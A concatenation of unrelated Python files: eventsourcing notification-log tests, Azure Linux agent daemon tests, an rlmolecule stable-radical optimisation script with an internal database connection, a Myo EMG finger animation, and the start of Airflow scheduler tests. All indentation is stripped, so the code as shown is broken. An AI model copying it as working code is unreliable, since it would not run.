self.assertEqual(reader.position, saved_position + advance_by)
# Read items between particular positions.
# - check that reading stops at the end of the slice and that position is tracked correctly
self.assertEqual(reader[0]["id"], 1)
self.assertEqual(reader.position, 1)
self.assertEqual(next(reader)["id"], 2)
self.assertEqual(reader.position, 2)
reader.seek(5)
self.assertEqual(next(reader)["id"], 6)
self.assertEqual(reader.position, 6)
reader.seek(0)
list(reader)
self.assertEqual(reader.position, 21)
self.assertEqual(len(list(reader[0:1])), 1)
self.assertEqual(reader.position, 1)
self.assertEqual(len(list(reader[1:3])), 2)
self.assertEqual(reader.position, 3)
self.assertEqual(len(list(reader[2:5])), 3)
self.assertEqual(reader.position, 5)
self.assertEqual(len(list(reader[3:7])), 4)
self.assertEqual(reader.position, 7)
self.assertEqual(len(list(reader[13:20])), 7)
self.assertEqual(reader.position, 20)
self.assertEqual(len(list(reader[18:20])), 2)
self.assertEqual(reader.position, 20)
self.assertEqual(len(list(reader[19:20])), 1)
self.assertEqual(reader.position, 20)
self.assertEqual(len(list(reader[20:20])), 0)
self.assertEqual(reader.position, 20)
self.assertEqual(len(list(reader[21:20])), 0)
self.assertEqual(reader.position, 21)
with self.assertRaises(StopIteration):
next(reader)
class TestRemoteNotificationLog(NotificationLogTestCase):
use_named_temporary_file = True
def test_remote_notification_log(self):
num_notifications = 42
section_size = 5
# Build a notification log (fixture).
self.append_notifications(num_notifications)
# Start a simple server.
from wsgiref.util import setup_testing_defaults
from wsgiref.simple_server import make_server
port = 8080
base_url = "http://127.0.0.1:{}/notifications/".format(port)
def simple_app(environ, start_response):
"""Simple WSGI application."""
setup_testing_defaults(environ)
# Identify log and section from request.
path_info = environ["PATH_INFO"]
try:
section_id = path_info.strip("/").split("/")[-1]
except ValueError:
# Start response.
status = "404 Not Found"
headers = [("Content-type", "text/plain; charset=utf-8")]
start_response(status, headers)
return []
# Select the notification log.
notification_log = self.create_notification_log(section_size)
# Get serialized section.
json_encoder = ObjectJSONEncoder()
view = NotificationLogView(notification_log, json_encoder)
resource = view.present_resource(section_id)
# Todo: Maybe redirect if the section ID is a mismatch, so
# the URL is good for caching.
# Start response.
status = "200 OK"
headers = [("Content-type", "text/plain; charset=utf-8")]
start_response(status, headers)
# Return a list of lines.
return [resource]
httpd = make_server("", port, simple_app)
print("Serving on port {}...".format(port))
thread = Thread(target=httpd.serve_forever)
thread.daemon = True
thread.start()
try:
# Use reader with client to read all items in remote feed after item 5.
notification_log = RemoteNotificationLog(base_url)
# Just before we start, test the deserialize_section_size exceptions.
notification_log.deserialize_section_size("1")
with self.assertRaises(ValueError):
notification_log.deserialize_section_size('"1')
with self.assertRaises(TypeError):
notification_log.deserialize_section_size('"1"')
# Get all the items.
notification_log_reader = NotificationLogReader(
notification_log=notification_log
)
items_from_start = notification_log_reader.list_notifications()
# Check we got all the items.
self.assertEqual(len(items_from_start), num_notifications)
self.assertEqual(items_from_start[0]["id"], 1)
self.assertEqual(items_from_start[0]["state"], b"item1")
self.assertEqual(
items_from_start[0]["topic"],
"eventsourcing.domain.model.events#DomainEvent",
)
expected_section_count = ceil(num_notifications / float(section_size))
self.assertEqual(
notification_log_reader.section_count, expected_section_count
)
# Get all the items from item 5.
items_from_5 = list(notification_log_reader[section_size - 1 :])
# Check we got everything after item 5.
self.assertEqual(len(items_from_5), num_notifications - section_size + 1)
self.assertEqual(items_from_5[0]["id"], section_size)
self.assertEqual(
items_from_5[0]["topic"],
"eventsourcing.domain.model.events#DomainEvent",
)
self.assertEqual(
items_from_5[0]["state"], "item{}".format(section_size).encode("utf8")
)
expected_section_count = ceil(num_notifications / float(section_size))
self.assertEqual(
notification_log_reader.section_count, expected_section_count
)
# Check ValueError is raised for deserialization errors.
with self.assertRaises(ValueError):
notification_log.deserialize_section("invalid json")
finally:
httpd.shutdown()
thread.join()
httpd.server_close()
class TestNotificationLogWithDjango(DjangoTestCase, TestNotificationLog):
pass
class TestBigArrayNotificationLogWithDjango(
DjangoTestCase, TestBigArrayNotificationLog
):
pass
class TestBigArrayNotificationLogWithCassandra(
WithCassandraRecordManagers, TestBigArrayNotificationLog
):
pass
|
test_daemon.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import unittest
from multiprocessing import Process
import azurelinuxagent.common.conf as conf
from azurelinuxagent.daemon.main import OPENSSL_FIPS_ENVIRONMENT, get_daemon_handler
from azurelinuxagent.pa.provision.default import ProvisionHandler
from tests.tools import AgentTestCase, Mock, patch
class MockDaemonCall(object):
def __init__(self, daemon_handler, count):
self.daemon_handler = daemon_handler
self.count = count
def __call__(self, *args, **kw):
self.count = self.count - 1
# Stop daemon after restarting for n times
if self.count <= 0:
self.daemon_handler.running = False
raise Exception("Mock unhandled exception")
class TestDaemon(AgentTestCase):
@patch("time.sleep")
def test_daemon_restart(self, mock_sleep):
# Mock daemon function
daemon_handler = get_daemon_handler()
mock_daemon = Mock(side_effect=MockDaemonCall(daemon_handler, 2))
daemon_handler.daemon = mock_daemon
daemon_handler.check_pid = Mock()
daemon_handler.run()
mock_sleep.assert_any_call(15)
self.assertEqual(2, daemon_handler.daemon.call_count)
@patch("time.sleep")
@patch("azurelinuxagent.daemon.main.conf")
@patch("azurelinuxagent.daemon.main.sys.exit")
def test_check_pid(self, mock_exit, mock_conf, _):
daemon_handler = get_daemon_handler()
mock_pid_file = os.path.join(self.tmp_dir, "pid")
mock_conf.get_agent_pid_file_path = Mock(return_value=mock_pid_file)
daemon_handler.check_pid()
self.assertTrue(os.path.isfile(mock_pid_file))
daemon_handler.check_pid()
mock_exit.assert_any_call(0)
@patch("azurelinuxagent.daemon.main.DaemonHandler.check_pid")
@patch("azurelinuxagent.common.conf.get_fips_enabled", return_value=True)
def test_set_openssl_fips(self, _, __):
daemon_handler = get_daemon_handler()
daemon_handler.running = False
with patch.dict("os.environ"):
daemon_handler.run()
self.assertTrue(OPENSSL_FIPS_ENVIRONMENT in os.environ)
self.assertEqual('1', os.environ[OPENSSL_FIPS_ENVIRONMENT])
@patch("azurelinuxagent.daemon.main.DaemonHandler.check_pid")
@patch("azurelinuxagent.common.conf.get_fips_enabled", return_value=False)
def test_does_not_set_openssl_fips(self, _, __):
daemon_handler = get_daemon_handler()
daemon_handler.running = False
with patch.dict("os.environ"):
daemon_handler.run()
self.assertFalse(OPENSSL_FIPS_ENVIRONMENT in os.environ)
@patch('azurelinuxagent.common.conf.get_provisioning_agent', return_value='waagent')
@patch('azurelinuxagent.ga.update.UpdateHandler.run_latest')
@patch('azurelinuxagent.pa.provision.default.ProvisionHandler.run')
def test_daemon_agent_enabled(self, patch_run_provision, patch_run_latest, gpa): # pylint: disable=unused-argument
"""
Agent should run normally when no disable_agent is found
"""
with patch('azurelinuxagent.pa.provision.get_provision_handler', return_value=ProvisionHandler()):
# DaemonHandler._initialize_telemetry requires communication with WireServer and IMDS; since we
# are not using telemetry in this test we mock it out
with patch('azurelinuxagent.daemon.main.DaemonHandler._initialize_telemetry'):
self.assertFalse(os.path.exists(conf.get_disable_agent_file_path()))
daemon_handler = get_daemon_handler()
def stop_daemon(child_args): # pylint: disable=unused-argument
daemon_handler.running = False
patch_run_latest.side_effect = stop_daemon
daemon_handler.run()
self.assertEqual(1, patch_run_provision.call_count)
self.assertEqual(1, patch_run_latest.call_count)
@patch('azurelinuxagent.common.conf.get_provisioning_agent', return_value='waagent')
@patch('azurelinuxagent.ga.update.UpdateHandler.run_latest', side_effect=AgentTestCase.fail)
@patch('azurelinuxagent.pa.provision.default.ProvisionHandler.run', side_effect=ProvisionHandler.write_agent_disabled)
def test_daemon_agent_disabled(self, _, patch_run_latest, gpa): # pylint: disable=unused-argument
"""
Agent should provision, then sleep forever when disable_agent is found
"""
with patch('azurelinuxagent.pa.provision.get_provision_handler', return_value=ProvisionHandler()):
# file is created by provisioning handler
self.assertFalse(os.path.exists(conf.get_disable_agent_file_path()))
daemon_handler = get_daemon_handler()
# we need to assert this thread will sleep forever, so fork it
daemon = Process(target=daemon_handler.run)
daemon.start()
daemon.join(timeout=5)
self.assertTrue(daemon.is_alive())
daemon.terminate()
# disable_agent was written, run_latest was not called
self.assertTrue(os.path.exists(conf.get_disable_agent_file_path()))
self.assertEqual(0, patch_run_latest.call_count)
if __name__ == '__main__':
unittest.main()
|
stable_radical_opt_from_initial_center.py
|
import argparse
import logging
import os
import pathlib
import sys
from typing import Tuple
import numpy as np
import pandas as pd
import rdkit
from rdkit import Chem
from sqlalchemy import create_engine
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
run_id = 'stable_radical_optimization_psj_NS_l2'
def construct_problem(stability_model: pathlib.Path, redox_model: pathlib.Path, bde_model: pathlib.Path, **kwargs):
# We have to delay all importing of tensorflow until the child processes launch,
# see https://github.com/tensorflow/tensorflow/issues/8220. We should be more careful about where / when we
# import tensorflow, especially if there's a chance we'll use tf.serving to do the policy / reward evaluations on
# the workers. Might require upstream changes to nfp as well.
from rlmolecule.tree_search.reward import RankedRewardFactory
from rlmolecule.molecule.molecule_state import MoleculeState
from rlmolecule.molecule.molecule_problem import MoleculeTFAlphaZeroProblem
from rlmolecule.tree_search.metrics import collect_metrics
from examples.stable_radical_optimization.stable_radical_molecule_state import MoleculeBuilderProtectRadical
import tensorflow as tf
# TODO update/incorporate this code
sys.path.append('/projects/rlmolecule/pstjohn/models/20201031_bde/')
from preprocess_inputs import preprocessor as bde_preprocessor
bde_preprocessor.from_json('/projects/rlmolecule/pstjohn/models/20201031_bde/preprocessor.json')
# TODO make this into a command-line argument(?)
# or just store it in this directory
# bde_preprocessor = preprocessor.load_preprocessor(saved_preprocessor_file="/projects/rlmolecule/pstjohn/models/20201031_bde/preprocessor.json")
@tf.function(experimental_relax_shapes=True)
def predict(model: 'tf.keras.Model', inputs):
return model.predict_step(inputs)
class StableRadOptProblem(MoleculeTFAlphaZeroProblem):
def __init__(self, engine: 'sqlalchemy.engine.Engine', builder: 'MoleculeBuilder',
stability_model: 'tf.keras.Model', redox_model: 'tf.keras.Model', bde_model: 'tf.keras.Model',
**kwargs) -> None:
self.engine = engine
self._builder = builder
self.stability_model = stability_model
self.redox_model = redox_model
self.bde_model = bde_model
super(StableRadOptProblem, self).__init__(engine, builder, **kwargs)
def get_initial_state(self) -> MoleculeState:
return MoleculeState(rdkit.Chem.MolFromSmiles('S[NH]'), self._builder)
def get_reward(self, state: MoleculeState) -> Tuple[float, dict]:
# Node is outside the domain of validity
policy_inputs = self.get_policy_inputs(state)
if ((policy_inputs['atom'] == 1).any() | (policy_inputs['bond'] == 1).any()):
return 0.0, {'forced_terminal': False, 'smiles': state.smiles, 'status': 'outside_dov'}
if state.forced_terminal:
reward, stats = self.calc_reward(state)
stats.update({'forced_terminal': True, 'smiles': state.smiles})
return reward, stats
return 0.0, {'forced_terminal': False, 'smiles': state.smiles}
@collect_metrics
def calc_reward(self, state: MoleculeState) -> Tuple[float, dict]:
"""Compute the reward and accompanying statistics for a terminal state,
combining predicted spin, buried volume, redox properties, and BDE."""
model_inputs = {
key: tf.constant(np.expand_dims(val, 0))
for key, val in self.get_policy_inputs(state).items()
}
spins, buried_vol = predict(self.stability_model, model_inputs)
spins = spins.numpy().flatten()
buried_vol = buried_vol.numpy().flatten()
atom_index = int(spins.argmax())
max_spin = spins[atom_index]
spin_buried_vol = buried_vol[atom_index]
atom_type = state.molecule.GetAtomWithIdx(atom_index).GetSymbol()
ionization_energy, electron_affinity = predict(self.redox_model, model_inputs).numpy().tolist()[0]
v_diff = ionization_energy - electron_affinity
bde, bde_diff = self.calc_bde(state)
ea_range = (-.5, 0.2)
ie_range = (.5, 1.2)
v_range = (1, 1.7)
bde_range = (60, 80)
# This is a bit of a placeholder; but the range for spin is about 1/50th that
# of buried volume.
reward = (
(1 - max_spin) * 50 + spin_buried_vol + 100 *
(self.windowed_loss(electron_affinity, ea_range) + self.windowed_loss(ionization_energy, ie_range) +
self.windowed_loss(v_diff, v_range) + self.windowed_loss(bde, bde_range)) / 4)
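# Rough magnitude check (illustrative numbers only): with max_spin ~ 0.5 and
# spin_buried_vol ~ 25, the first two terms each contribute ~25, while each
# windowed_loss term lies in [0, 1] and is scaled by 100 / 4 = 25, so the
# three contributions carry comparable weight.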
# the addition of bde_diff was to help ensure that
# the stable radical had the lowest bde in the molecule
# + 25 / (1 + np.exp(-(bde_diff - 10)))
stats = {
'max_spin': max_spin,
'spin_buried_vol': spin_buried_vol,
'ionization_energy': ionization_energy,
'electron_affinity': electron_affinity,
'bde': bde,
'bde_diff': bde_diff,
}
stats = {key: str(val) for key, val in stats.items()}
return reward, stats
def calc_bde(self, state: MoleculeState):
"""calculate the X-H bde, and the difference to the next-weakest X-H bde in kcal/mol"""
bde_inputs = self.prepare_for_bde(state.molecule)
# model_inputs = self.bde_get_inputs(state.molecule)
model_inputs = self.bde_get_inputs(bde_inputs.mol_smiles)
pred_bdes = predict(self.bde_model, model_inputs)
pred_bdes = pred_bdes[0][0, :, 0].numpy()
bde_radical = pred_bdes[bde_inputs.bond_index]
if len(bde_inputs.other_h_bonds) == 0:
bde_diff = 30. # Just an arbitrary large number
else:
other_h_bdes = pred_bdes[bde_inputs.other_h_bonds]
bde_diff = (other_h_bdes - bde_radical).min()
return bde_radical, bde_diff
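# A positive bde_diff means the radical-forming X-H bond is predicted to be
# the weakest H bond in the molecule, which is what the reward encourages.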
def prepare_for_bde(self, mol: rdkit.Chem.Mol):
radical_index = None
for i, atom in enumerate(mol.GetAtoms()):
if atom.GetNumRadicalElectrons() != 0:
assert radical_index is None
is_radical = True
radical_index = i
atom.SetNumExplicitHs(atom.GetNumExplicitHs() + 1)
atom.SetNumRadicalElectrons(0)
break
radical_rank = Chem.CanonicalRankAtoms(mol, includeChirality=True)[radical_index]
mol_smiles = Chem.MolToSmiles(mol)
# TODO this line seems redundant
mol = Chem.MolFromSmiles(mol_smiles)
radical_index_reordered = list(Chem.CanonicalRankAtoms(mol, includeChirality=True)).index(radical_rank)
molH = Chem.AddHs(mol)
for bond in molH.GetAtomWithIdx(radical_index_reordered).GetBonds():
if 'H' in {bond.GetBeginAtom().GetSymbol(), bond.GetEndAtom().GetSymbol()}:
bond_index = bond.GetIdx()
break
h_bond_indices = [
bond.GetIdx() for bond in filter(
lambda bond: ((bond.GetEndAtom().GetSymbol() == 'H')
| (bond.GetBeginAtom().GetSymbol() == 'H')), molH.GetBonds())
]
other_h_bonds = list(set(h_bond_indices) - {bond_index})
return pd.Series({
'mol_smiles': mol_smiles,
'radical_index_mol': radical_index_reordered,
'bond_index': bond_index,
'other_h_bonds': other_h_bonds
})
def bde_get_inputs(self, mol_smiles):
""" The BDE model was trained on a different set of data
so we need to use corresponding preprocessor here
"""
inputs = bde_preprocessor.construct_feature_matrices(mol_smiles, train=False)
assert not (inputs['atom'] == 1).any() | (inputs['bond'] == 1).any()
return {key: tf.constant(np.expand_dims(val, 0)) for key, val in inputs.items()}
def windowed_loss(self, target: float, desired_range: Tuple[float, float]) -> float:
""" Returns 0 if the molecule is in the middle of the desired range,
scaled loss otherwise. """
span = desired_range[1] - desired_range[0]
lower_lim = desired_range[0] + span / 6
upper_lim = desired_range[1] - span / 6
if target < lower_lim:
return max(1 - 3 * (abs(target - lower_lim) / span), 0)
elif target > upper_lim:
return max(1 - 3 * (abs(target - upper_lim) / span), 0)
else:
return 1
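# Illustrative values for desired_range=(60, 80) (span=20, limits ~63.3/76.7):
#   windowed_loss(70, (60, 80)) -> 1 (inside the window)
#   windowed_loss(62, (60, 80)) -> 0.8 (1 - 3 * |62 - 63.33| / 20)
#   windowed_loss(50, (60, 80)) -> 0 (clipped by the max(..., 0))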
stability_model = tf.keras.models.load_model(stability_model, compile=False)
redox_model = tf.keras.models.load_model(redox_model, compile=False)
bde_model = tf.keras.models.load_model(bde_model, compile=False)
builder = MoleculeBuilderProtectRadical(
max_atoms=15,
min_atoms=6,
# min_atoms is 4 for other radicals; for S[NH] we increase it to prevent early termination from high QED scores
tryEmbedding=True,
sa_score_threshold=4.,
stereoisomers=True,
atom_additions=('C', 'N', 'O', 'S'),
)
# engine = create_engine(f'sqlite:///stable_radical.db',
# connect_args={'check_same_thread': False},
# execution_options = {"isolation_level": "AUTOCOMMIT"})
dbname = "bde"
port = "5432"
host = "yuma.hpc.nrel.gov"
user = "rlops"
# read the password from a file
passwd_file = '/projects/rlmolecule/rlops_pass'
with open(passwd_file, 'r') as f:
passwd = f.read().strip()
drivername = "postgresql+psycopg2"
engine_str = f'{drivername}://{user}:{passwd}@{host}:{port}/{dbname}'
engine = create_engine(engine_str, execution_options={"isolation_level": "AUTOCOMMIT"})
reward_factory = RankedRewardFactory(engine=engine,
run_id=run_id,
reward_buffer_max_size=250,
reward_buffer_min_size=50,
ranked_reward_alpha=0.75)
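# Note (assumption, not verified against rlmolecule internals): a ranked-reward
# factory typically binarizes raw rewards by comparing them against the
# alpha-quantile (here 0.75) of a buffer of recent game rewards, once the
# buffer holds at least reward_buffer_min_size entries.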
problem = StableRadOptProblem(
engine,
builder,
stability_model,
redox_model,
bde_model,
run_id=run_id,
reward_class=reward_factory,
features=64,
num_heads=4, # Number of attention heads
num_messages=3,
batch_size=32,
max_buffer_size=256,
min_buffer_size=128, # Don't start training the model until this many games have occurred
policy_checkpoint_dir=os.path.join('policy_checkpoints', run_id))
return problem
def run_games(**kwargs):
from rlmolecule.alphazero.alphazero import AlphaZero
dirichlet_alpha = 1.0
dirichlet_x = 0.5
game = AlphaZero(
construct_problem(**kwargs),
dirichlet_alpha=dirichlet_alpha,
dirichlet_x=dirichlet_x,
)
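# Assumption: dirichlet_alpha is the concentration of the Dirichlet noise mixed
# into the root prior and dirichlet_x the mixing fraction, following the usual
# AlphaZero exploration scheme; check the rlmolecule docs for exact semantics.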
while True:
path, reward = game.run(num_mcts_samples=500)
# logger.info(f'Game Finished -- Reward {reward.raw_reward:.3f} -- Final state {path[-1][0]}')
logger.info(f'Game Finished -- Reward {reward.raw_reward:.3f} -- Final state {path[-1][0]}')
def train_model(**kwargs):
construct_problem(**kwargs).train_policy_model(steps_per_epoch=100, game_count_delay=20, verbose=2)
def setup_argparser():
parser = argparse.ArgumentParser(
description='Optimize stable radicals to work as both the anode and cathode of a redox-flow battery.')
parser.add_argument('--train-policy',
action="store_true",
default=False,
help='Train the policy model only (on GPUs)')
parser.add_argument('--rollout',
action="store_true",
default=False,
help='Run the game simulations only (on CPUs)')
# '/projects/rlmolecule/pstjohn/models/20210214_radical_stability_new_data/',
parser.add_argument('--stability-model',
'-S',
type=pathlib.Path,
required=True,
help='Radical stability model for computing the electron spin and buried volume')
# '/projects/rlmolecule/pstjohn/models/20210214_redox_new_data/',
parser.add_argument('--redox-model',
'-R',
type=pathlib.Path,
required=True,
help='Redox model for computing the ionization_energy and electron_affinity')
# '/projects/rlmolecule/pstjohn/models/20210216_bde_new_nfp/',
parser.add_argument('--bde-model',
'-B',
type=pathlib.Path,
required=True,
help='BDE model for computing the Bond Dissociation Energy')
return parser
if __name__ == "__main__":
parser = setup_argparser()
args = parser.parse_args()
kwargs = vars(args)
if args.train_policy:
train_model(**kwargs)
elif args.rollout:
# make sure the rollouts do not use the GPU
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
run_games(**kwargs)
else:
print("Must specify either --train-policy or --rollout")
# else:
# jobs = [multiprocessing.Process(target=monitor)]
# jobs[0].start()
# time.sleep(1)
# for i in range(5):
# jobs += [multiprocessing.Process(target=run_games)]
# jobs += [multiprocessing.Process(target=train_model)]
# for job in jobs[1:]:
# job.start()
# for job in jobs:
# job.join(300)
|
lerp_finger_from_myo.py
|
import multiprocessing
import re
from pyomyo import Myo, emg_mode
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
import bone
import serial_utils as s
# Use device manager to find the Arduino's serial port.
COM_PORT = "COM9"
RESET_SCALE = True
LEGACY_DECODE = False # If false, will use alpha encodings
q = multiprocessing.Queue()
# Plot Setup
fig = plt.figure("Finger plots from Myo")
ax = fig.add_subplot(111, projection='3d')
plt.subplots_adjust(left=0.25, bottom=0.25)
ax.set_xlabel('X [m]')
ax.set_ylabel('Y [m]')
ax.set_zlabel('Z [m]')
# ------------ Myo Setup ---------------
def emg_worker(q):
m = Myo(mode=emg_mode.PREPROCESSED)
m.connect()
def add_to_queue(emg, movement):
q.put(emg)
m.add_emg_handler(add_to_queue)
def print_battery(bat):
print("Battery level:", bat)
m.add_battery_handler(print_battery)
# Green logo and bar LEDs
m.set_leds([0, 128, 0], [0, 128, 0])
# Vibrate to know we connected okay
m.vibrate(1)
"""worker function"""
while True:
m.run()
print("Worker Stopped")
def emg_to_fingers(emg):
'''
Take in an 8-channel EMG array and
return a 5-element array, one value per finger.
'''
# Create a mapping between channel and finger
thumb_val = emg[2]
index_val = emg[4]
middle_val = emg[6]
ring_val = emg[7]
pinky_val = emg[0]
# Scale the values assuming emg mode is preprocessing
thumb_val = thumb_val / 1024
index_val = index_val / 1024
middle_val = middle_val / 1024
ring_val = ring_val / 1024
pinky_val = pinky_val / 1024
fingers = [thumb_val, index_val, middle_val, ring_val, pinky_val]
return fingers
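# Example (assuming PREPROCESSED EMG values in the 0-1024 range):
#   emg_to_fingers([512] * 8) -> [0.5, 0.5, 0.5, 0.5, 0.5]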
def animate(i):
fingers = [0,0,0,0,0]
emgs = [0,0,0,0,0,0,0,0]
while not(q.empty()):
emgs = list(q.get())
# Plot
ax.clear()
ax.set_xlabel('X [mm]')
ax.set_ylabel('Y [mm]')
ax.set_zlabel('Z [mm]')
if RESET_SCALE:
ax.set_xlim3d([-0.05, 0.1])
ax.set_ylim3d([-0.1, 0.1])
ax.set_zlim3d([0, 0.2])
# Convert emg to finger lerp values:
fingers = emg_to_fingers(emgs)
# Lerp the right hand
points = bone.lerp_fingers(fingers, bone.right_open_pose, bone.right_fist_pose)
# Plot the Points
bone.plot_steam_hand(points, "Lerped Pose", ax)
if __name__ == "__main__":
p = multiprocessing.Process(target=emg_worker, args=(q,), daemon=True)
p.start()
anim = animation.FuncAnimation(fig, animate, blit=False, interval=1)
try:
plt.show()
except KeyboardInterrupt:
quit()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
NUM_EXAMPLE_DAGS = 18
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
configuration.conf.load_test_config()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
